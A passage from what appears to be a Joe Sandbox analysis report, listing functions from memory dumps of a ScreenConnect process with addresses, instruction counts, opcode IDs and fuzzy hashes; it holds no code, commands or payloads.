                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: (nq
                                                                                                                                                                                                                                                                          • API String ID: 0-2756854522
                                                                                                                                                                                                                                                                          • Opcode ID: 32c6c062e957bcf21d2c8ff85920fdcb25678321dbdb34d34cd2261db565f263
                                                                                                                                                                                                                                                                          • Instruction ID: 67f69e32994bd4a93c7a23856af255a47a4c6bfbed1af9acf163c88664dca070
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 32c6c062e957bcf21d2c8ff85920fdcb25678321dbdb34d34cd2261db565f263
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE41B030A1010ACBCB15EF68E594A6EBBB6EF84314F04C56AD9099B355DF34E80ACB91
                                                                                                                                                                                                                                                                          Function 02483480 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: ['
                                                                                                                                                                                                                                                                          • API String ID: 0-410297704
                                                                                                                                                                                                                                                                          • Opcode ID: 8f99cfd120a166a702b065b3a77792ee975eff1d4ea0e62e2ad8c6258a3965ab
                                                                                                                                                                                                                                                                          • Instruction ID: 1aeae400f5c9128f5c08fb8b8320a690505feb3dfec5749a3c5c5cb6328c4e3b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f99cfd120a166a702b065b3a77792ee975eff1d4ea0e62e2ad8c6258a3965ab
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F31D2347042015BDB05AB78EC5096FBBEAEFC4611300856AE816DB365EF74ED0A8BD1
                                                                                                                                                                                                                                                                          Function 0248360A Relevance: .1, Instructions: 142COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 83479112a41e67a059b4c8242e11da905c70db8badc333fce24dfea2a2c87c73
                                                                                                                                                                                                                                                                          • Instruction ID: 938fba29b3aac853020d42aedcacc2d86cf38c0798ab35998eb17d282cc8b1ba
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 83479112a41e67a059b4c8242e11da905c70db8badc333fce24dfea2a2c87c73
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E65190746007058FCB34EF29D844A5ABFF1FF44B15B1486AAE456DB7A1E730E846CB90
                                                                                                                                                                                                                                                                          Function 02484940 Relevance: .1, Instructions: 142COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: acb8aaa94867cd1a4719092c705721deaca94fd1ccc5f46baf4b36dd8b4c4b4e
                                                                                                                                                                                                                                                                          • Instruction ID: bb2462ead66933f60621065934197976c1002610ca2d65165e1e4495feb01bfa
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: acb8aaa94867cd1a4719092c705721deaca94fd1ccc5f46baf4b36dd8b4c4b4e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62510934610A06CFC724DF29D884A6BB7F2FF8D324B144A6DD4969B7A4DB31E846CB44
                                                                                                                                                                                                                                                                          Function 02487770 Relevance: .1, Instructions: 137COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 40b3d3f3c1cf8f37b33166689afabe2a3fa3a956f0dd16db057fef344f60ff79
                                                                                                                                                                                                                                                                          • Instruction ID: 37fb8ecceb5a5fd4cc1519dec9a8f811f8481c4dc00e654f03b3a9915dbb4916
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 40b3d3f3c1cf8f37b33166689afabe2a3fa3a956f0dd16db057fef344f60ff79
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3951A074E003199FDB05EFB4D844B9DBBB5FF88300F108569E404AB3A5EB74A989CB90
                                                                                                                                                                                                                                                                          Function 0248366A Relevance: .1, Instructions: 113COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 1ca7d18b2c9c982e536658e43cf780484f0e48f6f44f71cc5c6308023e55b231
                                                                                                                                                                                                                                                                          • Instruction ID: 8d7ad6122d8146d3f5d65b9b2b45ab2f18fe608819920f99be23c2305837140d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ca7d18b2c9c982e536658e43cf780484f0e48f6f44f71cc5c6308023e55b231
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47416F746007058FCB24EF69D844A5EBBF5FF44B11B108A69E456D77A0EB30E846CB90
                                                                                                                                                                                                                                                                          Function 02483678 Relevance: .1, Instructions: 113COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: f82a5413e31599713c1069cbce492bc1dc68b49f415920d0d42525262eeec7a0
                                                                                                                                                                                                                                                                          • Instruction ID: 8b565eb3ffce4bcb80c2fcbbf37bea2242773a80a926a5ab8e74dd940b7d3c83
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f82a5413e31599713c1069cbce492bc1dc68b49f415920d0d42525262eeec7a0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6415E746107058FCB24EF29D944A5EBBF5FF48B11B108A69E456D77A0EB30E846CB90
                                                                                                                                                                                                                                                                          Function 02483DC0 Relevance: .1, Instructions: 108COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 422825ac813f1a106ff5fa2599d1a3cd8464aef3c2391736fce1dee5b56c156d
                                                                                                                                                                                                                                                                          • Instruction ID: 86f56df0f5d9bdf754d9d1ce9c8261f2dbcfaa3b95c95dd69d238fcc9153ca5c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 422825ac813f1a106ff5fa2599d1a3cd8464aef3c2391736fce1dee5b56c156d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90316D32B201068BDB14AF69C4946BFFBF6EF89755F1484AAD406E7394DB71DC018B90
                                                                                                                                                                                                                                                                          Function 02485548 Relevance: .1, Instructions: 84COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: a8b0ee6643db3c42592a9456f987e855bd01fa381c2ad4fb84308dec46683d54
                                                                                                                                                                                                                                                                          • Instruction ID: 71165da396324218e326878b5914296df460698b291976bccaff4f4d37257619
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a8b0ee6643db3c42592a9456f987e855bd01fa381c2ad4fb84308dec46683d54
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D314B306107058FC730EF29D884A6BB7F2EF89724B544A2DD45ADB7A4EB30E845CB91
                                                                                                                                                                                                                                                                          Function 02484FD0 Relevance: .1, Instructions: 83COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 988409015f1e9fd2bfcda71f2e4adf9bdb8e9534f0d4fe6a2d2c483bf1b0cb09
                                                                                                                                                                                                                                                                          • Instruction ID: eed9eb80af965c1a2377b34be5673694bc1d526cfa64c06a4393e251c2e7aa72
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 988409015f1e9fd2bfcda71f2e4adf9bdb8e9534f0d4fe6a2d2c483bf1b0cb09
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89318031A0014ADFCF05DFA8E9909CDBBB2FF89304F14846AE505BB265D732690BCB90
                                                                                                                                                                                                                                                                          Function 02483858 Relevance: .1, Instructions: 79COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 89053d376e0959ec418fc3cd703cccd115447c86f75dda1be49cdcd125e23b0d
                                                                                                                                                                                                                                                                          • Instruction ID: b627c02aecb960236ab39599e423b3906e6d7834e73a7f5acb27f41f84b0b4af
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 89053d376e0959ec418fc3cd703cccd115447c86f75dda1be49cdcd125e23b0d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5216B30F142458FC706AF68C9945AEBFB2EFC9600B1481EAD8499B3A5DB319D46CB91
                                                                                                                                                                                                                                                                          Function 024850C1 Relevance: .1, Instructions: 67COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 6ced90de2fdc7e825bbbe9bdb47c3a20768a5d11a043cf33fd5b28cfea5e24ae
                                                                                                                                                                                                                                                                          • Instruction ID: 64cc2b43048fc5010c43795e3be3649153778a64f6ba448433a6b83be2157f85
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ced90de2fdc7e825bbbe9bdb47c3a20768a5d11a043cf33fd5b28cfea5e24ae
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D21C0B57402405BD705EB78EC91BAE7BA6EFC5301F04C52AE445AB355EF30AD068BA2
                                                                                                                                                                                                                                                                          Function 02484B70 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 9da9cf60b1bb778c7b20fa8efe491a8e535819776aeb42172a9dd5c6a2141678
                                                                                                                                                                                                                                                                          • Instruction ID: 403d9357001e300fe9b594752fabad324e81418b98acac5389f40dc641c28c9e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9da9cf60b1bb778c7b20fa8efe491a8e535819776aeb42172a9dd5c6a2141678
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 84213C302106058FC734EF26D848A9AB7F5EF45324F008B6DD5A2976E1EB31E94ACF90
                                                                                                                                                                                                                                                                          Function 024850D0 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 3a17a20c39d8c0824d9986ede2be84575ba2692145d185ed1ffa84e82e31eb10
                                                                                                                                                                                                                                                                          • Instruction ID: a9cb8fd918cef3b238b055727cd8d114cd95a11494680380b4e3a5c79276f189
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a17a20c39d8c0824d9986ede2be84575ba2692145d185ed1ffa84e82e31eb10
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 111190B57402045BD704EB78E951B6EB7A6EFC4311F10C92AE505AB354EF70AE0587E2
                                                                                                                                                                                                                                                                          Function 02484F41 Relevance: .1, Instructions: 58COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 94512e5a84e693cfc7e819da607f4542c919bbc0174e9d35cae504d34645a82b
                                                                                                                                                                                                                                                                          • Instruction ID: b57f8340804db0558f5c5704bc1a5b89b9b0a999b04734286dae54e85ccc54d4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 94512e5a84e693cfc7e819da607f4542c919bbc0174e9d35cae504d34645a82b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D611427290424A9FCF01DFA8C9409DEBBF5EF4A314B108456E948FF261D771AA06CB90
                                                                                                                                                                                                                                                                          Function 02485649 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 10dffa1eebc0bbcb445d070a05e44b580402de9f02a9d316842603220359abfb
                                                                                                                                                                                                                                                                          • Instruction ID: 91afe6efa19a91a58b134da1fe0f385c737d614cd5b3be88823bb81ff7e6e9a0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 10dffa1eebc0bbcb445d070a05e44b580402de9f02a9d316842603220359abfb
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F411E370E003449FDB11DF68C800AAFBBB1AFC1710F4584ABD458EB261D7318902CB81
                                                                                                                                                                                                                                                                          Function 02485658 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: ff9b7b7114ee536504b8a42269a752a5238e169516488727c7d0e3ae3699f2fa
                                                                                                                                                                                                                                                                          • Instruction ID: ec45302c32f6c0eaeac768967d61d9ad08a4317ed6fbae7a363a1ced1bf3c273
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff9b7b7114ee536504b8a42269a752a5238e169516488727c7d0e3ae3699f2fa
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6611CE70F00204AFDB14DB68C800AAFB7B6EFC4710F958466D548E7294D7719902CB91
                                                                                                                                                                                                                                                                          Function 02485035 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: e5a9072f91272d0a1f992530129d91b1fe3c2e96c17533b5c8d64a27e84dcf67
                                                                                                                                                                                                                                                                          • Instruction ID: f6edd5c6d8026f98e6bd69199c09f6e42904b484327ab7fa1c9863ece4180a69
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e5a9072f91272d0a1f992530129d91b1fe3c2e96c17533b5c8d64a27e84dcf67
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F115E3155004DDBCB05EFA8D584ADDBBB2EF81304B95C456E005AB129D731E947CFA1
                                                                                                                                                                                                                                                                          Function 02486E58 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 7ee2ab59db935dbcbec1878efa05a6f5a9c6de44766a2ed73672cc4fbb6770d0
                                                                                                                                                                                                                                                                          • Instruction ID: 0e246518a5bd3eef7d3e7cb7a32a4e06ca03f769333674f8053c847e049fd02c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ee2ab59db935dbcbec1878efa05a6f5a9c6de44766a2ed73672cc4fbb6770d0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8901F971B182615FDB559B68A8104ABBBEDEFC4214315896BD485DB322DBB1DC07CB80
                                                                                                                                                                                                                                                                          Function 02484F50 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 478aef156d496d34f5cd09395c5ae38da2381392d55b5276cf0f85cbceee0fa9
                                                                                                                                                                                                                                                                          • Instruction ID: 37772bff4a5e9086f19aced7be233c6d9bf975aaafd5960a1fd1019f9662aaef
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 478aef156d496d34f5cd09395c5ae38da2381392d55b5276cf0f85cbceee0fa9
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4311163590010A9FCF40DFA8D9409DEBBF5FF49314B108556E509BB261D771AE06CB91
                                                                                                                                                                                                                                                                          Function 024812A0 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 7707a835d56f501543856190101f6b05ef27cc9bf97163155a9cfd79a376f804
                                                                                                                                                                                                                                                                          • Instruction ID: db7e4abaff156a48c110e24881c7afa1c426aa009b2bf12681b7a171a3bc21ce
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7707a835d56f501543856190101f6b05ef27cc9bf97163155a9cfd79a376f804
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D101CC346002449FC716EB78D840AAEBBF1DFC4200704C1AFC40EDB265DB31990ACB80
                                                                                                                                                                                                                                                                          Function 009DD01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2281470065.00000000009DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009DD000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_9dd000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: b9f8032a0ee80883be0d1ea69f492797f50aa2bd6fa6ad19b466abda9fb40fb0
                                                                                                                                                                                                                                                                          • Instruction ID: 95310eeeb484242fe646f4b2bd0672be8f614b82bf8dcaefe6a371fef0fa6ec3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b9f8032a0ee80883be0d1ea69f492797f50aa2bd6fa6ad19b466abda9fb40fb0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD01F7310463009AD7209A25CC84B67BF9CEF85364F18C42BED490B386C27D9801CAB1
                                                                                                                                                                                                                                                                          Function 009DD005 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2281470065.00000000009DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009DD000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_9dd000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 994b40744c6c50890a844dd1433d2c170241b36459b99756514ce051515fa380
                                                                                                                                                                                                                                                                          • Instruction ID: 35b27bb5276ea7127ba91c6116c1a36ef81e78cf32573ce8549b51b4763d98db
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 994b40744c6c50890a844dd1433d2c170241b36459b99756514ce051515fa380
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0101407100E3C09ED7128B258C94B52BFB8EF53224F18C1DBD9888F2A7C2695845C772
                                                                                                                                                                                                                                                                          Function 02488168 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
